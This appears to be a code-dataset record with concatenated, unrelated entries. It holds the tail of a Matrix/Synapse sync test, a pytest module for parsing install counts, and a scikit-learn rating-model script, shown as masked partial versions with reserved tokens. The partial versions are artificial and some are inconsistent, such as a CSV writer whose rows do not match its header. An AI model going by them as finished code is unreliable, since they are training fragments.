else.\n invite_room = self.helper.create_room_as(inviter, tok=inviter_tok)\n self.helper.invite(invite_room, targ=user, tok=inviter_tok)\n\n knock_room = self.helper.create_room_as(\n inviter, room_version=RoomVersions.V7.identifier, tok=inviter_tok\n )\n self.helper.send_state(\n knock_room,\n EventTypes.JoinRules,\n {\"join_rule\": JoinRules.KNOCK},\n tok=inviter_tok,\n )\n channel = self.make_request(\n \"POST\",\n \"/_matrix/client/r0/knock/%s\" % (knock_room,),\n b\"{}\",\n tok,\n )\n self.assertEqual(200, channel.code, channel.result)\n\n # The rooms should appear in the sync response.\n result = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)\n )\n )\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n\n # Test a incremental sync (by providing a since_token).\n result = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n requester,\n sync_config=generate_sync_config(user, device_id=\"dev\"),\n since_token=initial_result.next_batch,\n )\n )\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n\n # Poke the database and update the room version to an unknown one.\n for room_id in (joined_room, invite_room, knock_room):\n self.get_success(\n self.hs.get_datastores().main.db_pool.simple_update(\n \"rooms\",\n keyvalues={\"room_id\": room_id},\n updatevalues={\"room_version\": \"unknown-room-version\"},\n desc=\"updated-room-version\",\n )\n )\n\n # Blow away caches (supported room versions can only change due to a restart).\n self.store.get_rooms_for_user_with_stream_ordering.invalidate_all()\n self.store.get_rooms_for_user.invalidate_all()\n self.store._get_event_cache.clear()\n 
self.store._event_ref.clear()\n\n # The rooms should be excluded from the sync response.\n # Get a new request key.\n result = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)\n )\n )\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n\n # The rooms should also not be in an incremental sync.\n result = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n requester,\n sync_config=generate_sync_config(user, device_id=\"dev\"),\n since_token=initial_result.next_batch,\n )\n )\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n\n def test_ban_wins_race_with_join(self) -> None:\n \"\"\"Rooms shouldn't appear under \"joined\" if a join loses a race to a ban.\n\n A complicated edge case. Imagine the following scenario:\n\n * you attempt to join a room\n * racing with that is a ban which comes in over federation, which ends up with\n an earlier stream_ordering than the join.\n * you get a sync response with a sync token which is _after_ the ban, but before\n the join\n * now your join lands; it is a valid event because its `prev_event`s predate the\n ban, but will not make it into current_state_events (because bans win over\n joins in state res, essentially).\n * When we do a sync from the incremental sync, the only event in the timeline\n is your join ... and yet you aren't joined.\n\n The ban coming in over federation isn't crucial for this behaviour; the key\n requirements are:\n 1. the homeserver generates a join event with prev_events that precede the ban\n (so that it passes the \"are you banned\" test)\n 2. 
the join event has a stream_ordering after that of the ban.\n\n We use monkeypatching to artificially trigger condition (1).\n \"\"\"\n # A local user Alice creates a room.\n owner = self.register_user(\"alice\", \"password\")\n owner_tok = self.login(owner, \"password\")\n room_id = self.helper.create_room_as(owner, is_public=True, tok=owner_tok)\n\n # Do a sync as Alice to get the latest event in the room.\n alice_sync_result: SyncResult = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n create_requester(owner), generate_sync_config(owner)\n )\n )\n self.assertEqual(len(alice_sync_result.joined), 1)\n self.assertEqual(alice_sync_result.joined[0].room_id, room_id)\n last_room_creation_event_id = (\n alice_sync_result.joined[0].timeline.events[-1].event_id\n )\n\n # Eve, a ne'er-do-well, registers.\n eve = self.register_user(\"eve\", \"password\")\n eve_token = self.login(eve, \"password\")\n\n # Alice preemptively bans Eve.\n self.helper.ban(room_id, owner, eve, tok=owner_tok)\n\n # Eve syncs.\n eve_requester = create_requester(eve)\n eve_sync_config = generate_sync_config(eve)\n eve_sync_after_ban: SyncResult = self.get_success(\n self.sync_handler.wait_for_sync_for_user(eve_requester, eve_sync_config)\n )\n\n # Sanity check this sync result. We shouldn't be joined to the room.\n self.assertEqual(eve_sync_after_ban.joined, [])\n\n # Eve tries to join the room. 
We monkey patch the internal logic which selects\n # the prev_events used when creating the join event, such that the ban does not\n # precede the join.\n mocked_get_prev_events = patch.object(\n self.hs.get_datastores().main,\n \"get_prev_events_for_room\",\n new_callable=AsyncMock,\n return_value=[last_room_creation_event_id],\n )\n with mocked_get_prev_events:\n self.helper.join(room_id, eve, tok=eve_token)\n\n # Eve makes a second, incremental sync.\n eve_incremental_sync_after_join: SyncResult = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n eve_requester,\n eve_sync_config,\n since_token=eve_sync_after_ban.next_batch,\n )\n )\n # Eve should not see herself as joined to the room.\n self.assertEqual(eve_incremental_sync_after_join.joined, [])\n\n # If we did a third initial sync, we should _still_ see eve is not joined to the room.\n eve_initial_sync_after_join: SyncResult = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n eve_requester,\n eve_sync_config,\n since_token=None,\n )\n )\n self.assertEqual(eve_initial_sync_after_join.joined, [])\n\n\n_request_key = 0\n\n\ndef generate_sync_config(\n user_id: str, device_id: Optional[str] = \"device_id\"\n) -> SyncConfig:\n \"\"\"Generate a sync config (with a unique request key).\"\"\"\n global _request_key\n _request_key += 1\n return SyncConfig(\n user=UserID.from_string(user_id),\n filter_collection=Filtering(Mock()).DEFAULT_FILTER_COLLECTION,\n is_guest=False,\n request_key=(\"request_key\", _request_key),\n device_id=device_id,\n )\n",
"step-ids": [
6,
8,
9,
10,
11
]
}
|
[
6,
8,
9,
10,
11
] |
<|reserved_special_token_0|>
def int_installs(x):
try:
return int(x.replace(',', '').replace('+', ''))
except:
raise ValueError('Cannot transform to int.')
def test_int_install_1():
"""Unit test to showcase functionality of int of int
"""
expected_output_price = 65000
output_price = int_installs('65000')
assert math.fabs(output_price - expected_output_price
) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def int_installs(x):
try:
return int(x.replace(',', '').replace('+', ''))
except:
raise ValueError('Cannot transform to int.')
def test_int_install_1():
"""Unit test to showcase functionality of int of int
"""
expected_output_price = 65000
output_price = int_installs('65000')
assert math.fabs(output_price - expected_output_price
) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'
def test_int_install_2():
"""Unit test to showcase functionality of int of string with right format
"""
expected_output_price = 65000
output_price = int_installs('+65,000')
assert math.fabs(output_price - expected_output_price
) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'
def test_int_install_3():
"""Unit test to showcase functionality of int of strong with wrong format
"""
with pytest.raises(ValueError):
int_installs('$65000')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ROUND_OFF_ERROR = 0.001
def int_installs(x):
try:
return int(x.replace(',', '').replace('+', ''))
except:
raise ValueError('Cannot transform to int.')
def test_int_install_1():
"""Unit test to showcase functionality of int of int
"""
expected_output_price = 65000
output_price = int_installs('65000')
assert math.fabs(output_price - expected_output_price
) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'
def test_int_install_2():
"""Unit test to showcase functionality of int of string with right format
"""
expected_output_price = 65000
output_price = int_installs('+65,000')
assert math.fabs(output_price - expected_output_price
) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'
def test_int_install_3():
"""Unit test to showcase functionality of int of strong with wrong format
"""
with pytest.raises(ValueError):
int_installs('$65000')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import math
import pytest
ROUND_OFF_ERROR = 0.001
def int_installs(x):
try:
return int(x.replace(',', '').replace('+', ''))
except:
raise ValueError('Cannot transform to int.')
def test_int_install_1():
"""Unit test to showcase functionality of int of int
"""
expected_output_price = 65000
output_price = int_installs('65000')
assert math.fabs(output_price - expected_output_price
) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'
def test_int_install_2():
"""Unit test to showcase functionality of int of string with right format
"""
expected_output_price = 65000
output_price = int_installs('+65,000')
assert math.fabs(output_price - expected_output_price
) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'
def test_int_install_3():
"""Unit test to showcase functionality of int of strong with wrong format
"""
with pytest.raises(ValueError):
int_installs('$65000')
<|reserved_special_token_1|>
"""Unit test for int install
"""
import math
import pytest
ROUND_OFF_ERROR = 0.001
def int_installs(x):
    """Parse an install-count string such as ``'+65,000'`` into an int.

    Strips ``,`` thousands separators and a leading ``+`` sign before
    converting.

    Args:
        x: The raw install-count string.

    Returns:
        The parsed integer value.

    Raises:
        ValueError: If the cleaned string is not a valid integer (or the
            input is not a string at all).
    """
    try:
        return int(x.replace(',', '').replace('+', ''))
    except (AttributeError, TypeError, ValueError) as exc:
        # Narrowed from a bare `except:`, which would also swallow
        # SystemExit / KeyboardInterrupt.  AttributeError / TypeError cover
        # non-string input; chain the cause for easier debugging.
        raise ValueError("Cannot transform to int.") from exc
def test_int_install_1():
    """A plain digit string is parsed to the matching integer."""
    expected = 65000
    actual = int_installs('65000')
    difference = math.fabs(actual - expected)
    assert difference < ROUND_OFF_ERROR, \
        """Should show that the installs is 65000."""
def test_int_install_2():
    """A string with '+' sign and ',' separators is parsed correctly."""
    expected = 65000
    actual = int_installs('+65,000')
    difference = math.fabs(actual - expected)
    assert difference < ROUND_OFF_ERROR, \
        """Should show that the installs is 65000."""
def test_int_install_3():
    """A string with an unexpected character raises ValueError."""
    bad_input = '$65000'
    with pytest.raises(ValueError):
        int_installs(bad_input)
|
flexible
|
{
"blob_id": "b874bfe9590a3eaff4298d6f9cc72be92000dc30",
"index": 1108,
"step-1": "<mask token>\n\n\ndef int_installs(x):\n try:\n return int(x.replace(',', '').replace('+', ''))\n except:\n raise ValueError('Cannot transform to int.')\n\n\ndef test_int_install_1():\n \"\"\"Unit test to showcase functionality of int of int\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('65000')\n assert math.fabs(output_price - expected_output_price\n ) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef int_installs(x):\n try:\n return int(x.replace(',', '').replace('+', ''))\n except:\n raise ValueError('Cannot transform to int.')\n\n\ndef test_int_install_1():\n \"\"\"Unit test to showcase functionality of int of int\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('65000')\n assert math.fabs(output_price - expected_output_price\n ) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'\n\n\ndef test_int_install_2():\n \"\"\"Unit test to showcase functionality of int of string with right format\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('+65,000')\n assert math.fabs(output_price - expected_output_price\n ) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'\n\n\ndef test_int_install_3():\n \"\"\"Unit test to showcase functionality of int of strong with wrong format\n \"\"\"\n with pytest.raises(ValueError):\n int_installs('$65000')\n",
"step-3": "<mask token>\nROUND_OFF_ERROR = 0.001\n\n\ndef int_installs(x):\n try:\n return int(x.replace(',', '').replace('+', ''))\n except:\n raise ValueError('Cannot transform to int.')\n\n\ndef test_int_install_1():\n \"\"\"Unit test to showcase functionality of int of int\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('65000')\n assert math.fabs(output_price - expected_output_price\n ) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'\n\n\ndef test_int_install_2():\n \"\"\"Unit test to showcase functionality of int of string with right format\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('+65,000')\n assert math.fabs(output_price - expected_output_price\n ) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'\n\n\ndef test_int_install_3():\n \"\"\"Unit test to showcase functionality of int of strong with wrong format\n \"\"\"\n with pytest.raises(ValueError):\n int_installs('$65000')\n",
"step-4": "<mask token>\nimport math\nimport pytest\nROUND_OFF_ERROR = 0.001\n\n\ndef int_installs(x):\n try:\n return int(x.replace(',', '').replace('+', ''))\n except:\n raise ValueError('Cannot transform to int.')\n\n\ndef test_int_install_1():\n \"\"\"Unit test to showcase functionality of int of int\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('65000')\n assert math.fabs(output_price - expected_output_price\n ) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'\n\n\ndef test_int_install_2():\n \"\"\"Unit test to showcase functionality of int of string with right format\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('+65,000')\n assert math.fabs(output_price - expected_output_price\n ) < ROUND_OFF_ERROR, 'Should show that the installs is 65000.'\n\n\ndef test_int_install_3():\n \"\"\"Unit test to showcase functionality of int of strong with wrong format\n \"\"\"\n with pytest.raises(ValueError):\n int_installs('$65000')\n",
"step-5": "\"\"\"Unit test for int install\n\"\"\"\nimport math\nimport pytest\n\nROUND_OFF_ERROR = 0.001\n\ndef int_installs(x):\n try:\n return int(x.replace(',', '').replace('+', ''))\n except:\n raise ValueError(\"Cannot transform to int.\")\n \ndef test_int_install_1():\n \"\"\"Unit test to showcase functionality of int of int\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('65000')\n assert math.fabs(output_price - expected_output_price) < ROUND_OFF_ERROR, \\\n \"\"\"Should show that the installs is 65000.\"\"\"\n\ndef test_int_install_2():\n \"\"\"Unit test to showcase functionality of int of string with right format\n \"\"\"\n expected_output_price = 65000\n output_price = int_installs('+65,000')\n assert math.fabs(output_price - expected_output_price) < ROUND_OFF_ERROR, \\\n \"\"\"Should show that the installs is 65000.\"\"\"\n\ndef test_int_install_3():\n \"\"\"Unit test to showcase functionality of int of strong with wrong format\n \"\"\"\n with pytest.raises(ValueError): \n int_installs('$65000')",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
import numpy as np
import pandas as pd
import datetime
import time
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import KNeighborsRegressor
from sklearn.model_selection import cross_val_score
from sklearn import preprocessing
from sklearn.model_selection import KFold
def make_submission(y_predict, user_id_test, movie_id_test, name=None, date=True):
    """Write rating predictions to a CSV submission file.

    Parameters
    ----------
    y_predict : sequence of float
        Predicted ratings, aligned element-wise with the id sequences.
    user_id_test, movie_id_test : sequence of int
        User / movie ids for each prediction.
    name : str, optional
        Base file name (without extension); defaults to ``'submission'``.
    date : bool
        If True, append a ``dd-mm-YYYY_HHhMM`` timestamp to the file name.

    Raises
    ------
    ValueError
        If any prediction is NaN.
    """
    n_elements = len(y_predict)
    if name is None:
        name = 'submission'
    if date:
        name = name + '_{}'.format(time.strftime('%d-%m-%Y_%Hh%M'))
    # `with` guarantees the file is flushed/closed even if a NaN aborts us.
    with open(name + ".csv", 'w') as f:
        f.write('"USER_ID_MOVIE_ID","PREDICTED_RATING"\n')
        for i in range(n_elements):
            if np.isnan(y_predict[i]):
                raise ValueError('NaN detected!')
            # The header declares a single combined id column, so the two ids
            # are joined with '_' (the old code emitted three comma-separated
            # fields, producing rows inconsistent with the header).
            line = '{:0.0f}_{:0.0f},{}\n'.format(user_id_test[i],
                                                 movie_id_test[i],
                                                 y_predict[i])
            f.write(line)
    print("Submission file successfully written!")
class ModelSelection:
    """Nested cross-validation to pick hyper-parameters for rating predictors.

    Holds the preprocessed feature matrices and exposes one optimizer per
    candidate estimator family.  Each optimizer returns
    ``[best_param, final_error]`` where ``final_error`` is the mean squared
    error of the winning model re-estimated by cross-validation on the
    whole data set.
    """

    def __init__(self, user_data, movie_data, aggregated_data, train_data,
                 output_train):
        # Only `aggregated` and `output_train` are used by the optimizers;
        # the other matrices are kept for potential later use.
        self.train = train_data
        self.users = user_data
        self.aggregated = aggregated_data
        self.movies = movie_data
        self.output_train = output_train

    def _optimize(self, nb_fold, param_range, make_model):
        """Shared nested-CV loop over one hyper-parameter.

        Parameters
        ----------
        nb_fold : int
            Number of folds for both the outer and inner CV.
        param_range : iterable
            Candidate values of the hyper-parameter.
        make_model : callable
            Maps one candidate value to a fresh (unfitted) estimator.

        Returns
        -------
        list
            ``[best_param, final_mse]``.
        """
        params = list(param_range)
        errors = np.zeros(len(params))
        kf = KFold(n_splits=nb_fold)
        # Outer CV: accumulate each candidate's inner-CV error over folds.
        for train_index, _test_index in kf.split(self.aggregated):
            for i, param in enumerate(params):
                scores = cross_val_score(
                    make_model(param),
                    self.aggregated[train_index],
                    self.output_train[train_index],
                    cv=nb_fold,
                    scoring='neg_mean_squared_error')
                errors[i] += -scores.mean()
        errors /= nb_fold
        # argmin is robust even when every error exceeds 5; the previous
        # hard-coded `best_error = 5` threshold could silently leave the
        # selected parameter at 0 in that case.
        best_param = params[int(np.argmin(errors))]
        # Re-estimate the winning model's error on the whole data set.
        final_error = -cross_val_score(
            make_model(best_param), self.aggregated, self.output_train,
            cv=nb_fold, scoring='neg_mean_squared_error')
        return [best_param, final_error.mean()]

    def optimizeParametersDecisionTreeClassifier(self, nb_fold,
                                                 max_depth_range):
        """Select the best ``max_depth`` for a DecisionTreeClassifier."""
        return self._optimize(
            nb_fold, max_depth_range,
            lambda depth: DecisionTreeClassifier(max_depth=depth))

    def optimizeParametersKNeighborsClassifier(self, nb_fold, k_range):
        """Select the best ``n_neighbors`` for a KNeighborsClassifier."""
        return self._optimize(
            nb_fold, k_range,
            lambda k: KNeighborsClassifier(n_neighbors=k))

    def optimizeParametersKNeighborsRegressor(self, nb_fold, k_range):
        """Select the best ``n_neighbors`` for a KNeighborsRegressor."""
        return self._optimize(
            nb_fold, k_range,
            lambda k: KNeighborsRegressor(n_neighbors=k))
# --- Script entry point: load the preprocessed data sets. ---
# NOTE(review): file names embed generation timestamps — presumably produced
# by a separate preprocessing step; confirm the files exist before running.
users = pd.read_csv("data/user_data_normalized_28-11-2016_01h32.csv", delimiter=",")
movies = pd.read_csv("data/movie_data_normalized.csv", delimiter=",")
train = pd.read_csv("data/data_train.csv", delimiter=",")
# Keep only the target column from the training outputs.
output = pd.read_csv("data/output_train.csv", delimiter=",")["rating"]
aggregated = pd.read_csv("data/agregated_data_28-11-2016_01h50.csv", delimiter=",")
# Run hyper-parameter selection; only the kNN-classifier search is enabled,
# the other searches are left commented out for manual experimentation.
ms = ModelSelection(users.values, movies.values, aggregated.values, train.values, output)
#print(ms.optimizeParametersDecisionTreeClassifier(5, range(2,3,1)))
print(ms.optimizeParametersKNeighborsClassifier(5, range(1,5,1)))
#print(ms.optimizeParametersKNeighborsClassifier(5, range(5,10,1)))
|
normal
|
{
"blob_id": "5172819da135600d0764033a85a4175098274806",
"index": 7388,
"step-1": "<mask token>\n\n\nclass ModelSelection:\n\n def __init__(self, user_data, movie_data, aggregated_data, train_data,\n output_train):\n self.train = train_data\n self.users = user_data\n self.aggregated = aggregated_data\n self.movies = movie_data\n self.output_train = output_train\n\n def optimizeParametersDecisionTreeClassifier(self, nb_fold, max_depth_range\n ):\n kf = KFold(n_splits=nb_fold)\n depth_n_errors = np.zeros((max_depth_range.__len__(), 2))\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][0] = depth\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for depth in max_depth_range:\n dt = DecisionTreeClassifier(max_depth=depth)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n depth_n_errors[i][1] += -scores.mean()\n i += 1\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][1] /= nb_fold\n i += 1\n best_depth = 0\n best_error = 5\n for depth, error in depth_n_errors:\n if error < best_error:\n best_error = error\n best_depth = depth\n dt = DecisionTreeClassifier(max_depth=best_depth)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_depth, final_error.mean()]\n\n def optimizeParametersKNeighborsClassifier(self, nb_fold, k_range):\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < 
best_error:\n best_error = error\n best_k = k\n dt = KNeighborsClassifier(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n def optimizeParametersKNeighborsRegressor(self, nb_fold, k_range):\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsRegressor(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsRegressor(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef make_submission(y_predict, user_id_test, movie_id_test, name=None, date\n =True):\n n_elements = len(y_predict)\n if name is None:\n name = 'submission'\n if date:\n name = name + '_{}'.format(time.strftime('%d-%m-%Y_%Hh%M'))\n with open(name + '.csv', 'w') as f:\n f.write('\"USER_ID_MOVIE_ID\",\"PREDICTED_RATING\"\\n')\n for i in range(n_elements):\n if np.isnan(y_predict[i]):\n raise ValueError('NaN detected!')\n line = '{:0.0f},{:0.0f},{}\\n'.format(user_id_test[i],\n movie_id_test[i], y_predict[i])\n f.write(line)\n print('Submission file successfully written!')\n\n\nclass ModelSelection:\n\n def __init__(self, user_data, movie_data, aggregated_data, train_data,\n output_train):\n self.train = train_data\n self.users = user_data\n self.aggregated = aggregated_data\n self.movies = movie_data\n self.output_train = output_train\n\n def optimizeParametersDecisionTreeClassifier(self, nb_fold, max_depth_range\n ):\n kf = KFold(n_splits=nb_fold)\n depth_n_errors = np.zeros((max_depth_range.__len__(), 2))\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][0] = depth\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for depth in max_depth_range:\n dt = DecisionTreeClassifier(max_depth=depth)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n depth_n_errors[i][1] += -scores.mean()\n i += 1\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][1] /= nb_fold\n i += 1\n best_depth = 0\n best_error = 5\n for depth, error in depth_n_errors:\n if error < best_error:\n best_error = error\n best_depth = depth\n dt = DecisionTreeClassifier(max_depth=best_depth)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_depth, final_error.mean()]\n\n def optimizeParametersKNeighborsClassifier(self, nb_fold, k_range):\n kf = 
KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsClassifier(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n def optimizeParametersKNeighborsRegressor(self, nb_fold, k_range):\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsRegressor(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsRegressor(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n\n<mask token>\nprint(ms.optimizeParametersKNeighborsClassifier(5, range(1, 5, 1)))\n",
"step-3": "<mask token>\n\n\ndef make_submission(y_predict, user_id_test, movie_id_test, name=None, date\n =True):\n n_elements = len(y_predict)\n if name is None:\n name = 'submission'\n if date:\n name = name + '_{}'.format(time.strftime('%d-%m-%Y_%Hh%M'))\n with open(name + '.csv', 'w') as f:\n f.write('\"USER_ID_MOVIE_ID\",\"PREDICTED_RATING\"\\n')\n for i in range(n_elements):\n if np.isnan(y_predict[i]):\n raise ValueError('NaN detected!')\n line = '{:0.0f},{:0.0f},{}\\n'.format(user_id_test[i],\n movie_id_test[i], y_predict[i])\n f.write(line)\n print('Submission file successfully written!')\n\n\nclass ModelSelection:\n\n def __init__(self, user_data, movie_data, aggregated_data, train_data,\n output_train):\n self.train = train_data\n self.users = user_data\n self.aggregated = aggregated_data\n self.movies = movie_data\n self.output_train = output_train\n\n def optimizeParametersDecisionTreeClassifier(self, nb_fold, max_depth_range\n ):\n kf = KFold(n_splits=nb_fold)\n depth_n_errors = np.zeros((max_depth_range.__len__(), 2))\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][0] = depth\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for depth in max_depth_range:\n dt = DecisionTreeClassifier(max_depth=depth)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n depth_n_errors[i][1] += -scores.mean()\n i += 1\n i = 0\n for depth in max_depth_range:\n depth_n_errors[i][1] /= nb_fold\n i += 1\n best_depth = 0\n best_error = 5\n for depth, error in depth_n_errors:\n if error < best_error:\n best_error = error\n best_depth = depth\n dt = DecisionTreeClassifier(max_depth=best_depth)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_depth, final_error.mean()]\n\n def optimizeParametersKNeighborsClassifier(self, nb_fold, k_range):\n kf = 
KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsClassifier(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n def optimizeParametersKNeighborsRegressor(self, nb_fold, k_range):\n kf = KFold(n_splits=nb_fold)\n k_n_errors = np.zeros((k_range.__len__(), 2))\n i = 0\n for k in k_range:\n k_n_errors[i][0] = k\n i += 1\n for train_index, test_index in kf.split(self.aggregated):\n i = 0\n for k in k_range:\n dt = KNeighborsRegressor(n_neighbors=k)\n scores = cross_val_score(dt, self.aggregated[train_index],\n self.output_train[train_index], cv=nb_fold, scoring=\n 'neg_mean_squared_error')\n k_n_errors[i][1] += -scores.mean()\n i += 1\n for i in range(k_range.__len__()):\n k_n_errors[i][1] /= nb_fold\n best_k = 0\n best_error = 5\n for k, error in k_n_errors:\n if error < best_error:\n best_error = error\n best_k = k\n dt = KNeighborsRegressor(n_neighbors=best_k)\n final_error = -cross_val_score(dt, self.aggregated, self.\n output_train, cv=nb_fold, scoring='neg_mean_squared_error')\n return [best_k, final_error.mean()]\n\n\nusers = pd.read_csv('data/user_data_normalized_28-11-2016_01h32.csv',\n delimiter=',')\nmovies = pd.read_csv('data/movie_data_normalized.csv', delimiter=',')\ntrain = pd.read_csv('data/data_train.csv', delimiter=',')\noutput 
